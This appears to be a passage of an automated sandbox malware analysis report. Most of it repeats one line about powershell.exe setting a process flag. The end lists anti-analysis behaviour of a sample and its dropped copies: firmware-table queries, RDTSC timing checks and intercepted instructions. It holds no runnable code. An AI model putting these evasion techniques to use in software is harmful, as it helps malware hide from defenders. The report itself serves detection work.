                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 66CAA1
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 640B79
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 64C4C0
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 67ED87
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 6404DD
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 64A84B
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 62525A
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 62468A
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 674DEF
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 64657B
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 6736BC
                    Source: C:\Users\user\Desktop\UZPt0hR.exeAPI/Special instruction interceptor: Address: 7FF9105CE814
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSpecial instruction interceptor: First address: 674929 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSpecial instruction interceptor: First address: 140423438 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSpecial instruction interceptor: First address: 1402AC77B instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_005020A6 rdtsc 0_2_005020A6
